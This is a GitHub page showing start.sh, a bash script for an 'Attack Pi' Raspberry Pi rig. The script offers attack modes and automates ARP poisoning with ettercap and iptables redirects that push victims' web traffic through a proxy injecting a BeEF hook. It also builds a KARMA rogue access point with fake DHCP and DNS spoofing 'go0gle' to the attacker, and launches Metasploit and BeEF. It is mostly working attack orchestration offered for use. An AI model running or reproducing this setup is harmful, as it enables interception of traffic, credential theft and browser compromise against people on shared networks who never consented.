-
Notifications
You must be signed in to change notification settings - Fork 2
/
Copy pathstart.sh
executable file
·164 lines (140 loc) · 5.33 KB
/
start.sh
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
#!/bin/bash
echo "=========================="
echo "WELCOME TO ATTACK PI ALPHA"
echo "=========================="
echo ""
if [[ $EUID -ne 0 ]]; then
echo "This script must be run as root" 1>&2
exit 1
fi
echo "This startup process will take some time -- Metasploit and beef load slowly."
echo "What is the name of your internet interface?"
#TODO : Verify this interface actually exists
read internet
echo "What is the name of your LAN interface?"
#TODO: Verify this interface actually exists
read lan
echo "What is the name of your secondary WLAN interface?"
echo "(This interface will be used for 802.11 attacks+sniffing)"
read secondlan
echo "=========================="
echo "+ CHOOSE ATTACK MODE +"
echo "=========================="
echo ""
echo "1. Limpet Mine : Attach to network, attack with ARP Poison Ettercap and Easycreds"
echo "2. Passive Mode : Free Wifi, options for landing page attacks, passthru, ect..."
echo "3. Aggro Mode : Seek and destroy wireless network clients. Creates rouge AP"
read mode
case $mode in
1)
#limpet
#Start ettercap in man-in-the-middle ONLY mode, specifically arp poisioning
#NOTE: I kinda doubt that the Raspi is going to win any DHCP races under load, so I'm not including it right now
#TODO: Include DHCP poisoning
ettercap -T -o -M arp:remote // //
#MITM IP tables redirect.
#Redirects the HTTP port to our python proxy which injects the BEEF hook.js
#Pretty sure we already do this
iptables -F
iptables -X
iptables --table nat --flush
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-ports 8080
exit
;;
2)
#freewifi
conffile='../conf/freewifi.conf'
;;
3)
#balls-out attack mode
conffile='../hostapd.conf'
;;
*)
echo "Invalid mode selection."
#Todo: Make this recover from a bad mode select
exit
;;
esac
#============================================================================================#
#prep the interface for wireless operations.
killall wicd
killall dhclient
killall wpa_supplicant
killall wpa_cli
killall ifplugd
ifconfig $lan down
#setup IPTables -- no firewall, just NAT
iptables -F
iptables -X
iptables --table nat --flush
iptables -A INPUT -i lo -j ACCEPT
iptables -A OUTPUT -o lo -j ACCEPT
iptables -A INPUT -i $lan -j ACCEPT
iptables -A OUTPUT -o $lan -j ACCEPT
iptables -A FORWARD -i $internet -o wlan0 -j ACCEPT
iptables -A FORWARD -i $lan -o $internet -j ACCEPT
iptables -A POSTROUTING -t nat -o $internet -j MASQUERADE
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -i $lan -p tcp --dport 80 -j DNAT --to-destination 10.1.1.1:8080
#TODO: Fix proxy bugs for HTTPS connections -- Currently they pass through
#iptables -t nat -A PREROUTING -i wlan0 -p tcp --dport 443 -j DNAT --to-destination 10.1.1.1:8080
#warn user
echo "This will take some time. Get a coffee..."
#start TMUX
#TODO: Give this optional keybindings for screen or tmux-style byobu if possible
tmux start-server
tmux new-session -d -s Attack -n AttackPi
#TODO: there may be a bug here stopping hostapd from working properly, probably because of this stuff below. I rearranged the order.
#AP Configuration
ifconfig $lan down
ifconfig $lan hw ether 02:ab:cd:ef:12:30
# might be having issues with this....
ifconfig $lan 10.1.1.1 netmask 255.255.255.0
echo "interface=$lan"|cat - conf/$conffile > /tmp/out && mv /tmp/out /etc/hostapd.conf
#KARMA
killall hostapd-karma
tmux new-window -tAttack:5 -n 'HostAPD' 'bin/hostapd-karma -dd /etc/hostapd.conf'
echo "Started Karma Hostapd"
#DHCP
echo "interface $lan"|cat - conf/udhcpd.conf > /tmp/out && mv -f /tmp/out /etc/udhcpd.conf
killall udhcpd
tmux new-window -tAttack:6 -n 'dhcp' 'udhcpd -f /etc/udhcpd.conf'
#DNS
killall fakedns.py
#write configuration file for the default beef hook
#I used go0gle.com and give it the ip address assigned to the lan interface
# This is dynamic because i hope to set these values via a configuration file
# in the future revisions of this project
$lanip=`bin/get_ip.py $lan`
# TODO: Configuration file sets beef hook name
echo "go0gle.* $lanip"|cat - conf/dns.conf > /tmp/out && mv -f conf/dns.current
cd bin/
tmux new-window -tAttack:7 -n 'dns' 'fakedns.py ../conf/dns.current'
cd ../
#PROXY
killall proxy.py
tmux new-window -tAttack:7 -n 'Proxy' 'bin/proxy/proxpy.py -x bin/proxy/plugins/inject.py'
###########CANT ENABLE RELIABLY WITHOUT A 512MB PI################################
#MSRPC Service
killall msfconsole
# TODO: The MSFRPC password is hardcoded as pi/raspberry. This probably won't be suitable for advanced ass-hattery
echo "WARNING: THE MSFRPC PASSWORD IS 'raspberry' YOU HAVE TO CHANGE IT ON YOUR OWN IN THE SCRIPTS"
# locations bin/msf/scripts/beef/beef.rc, bin/beef/extensions/metasploit/config.yaml
tmux new-window -tAttack:8 -n 'MSF' 'bin/msf/msfconsole -r bin/msf/scripts/beef/beef.rc'
#sleep because we don't want beef to load before metasploit does
sleep 2m
########################################################################################
#Beef
killall beef
#beef hates being started from anywhere other than it's home folder.
cd bin/beef
tmux new-window -tAttack:9 -n 'BEEF' './beef'
cd ../../
#done
tmux attach -t Attack
#tmux select-window -tAttack:0
#byobu
echo "Services have started -- you may need to wait for beef."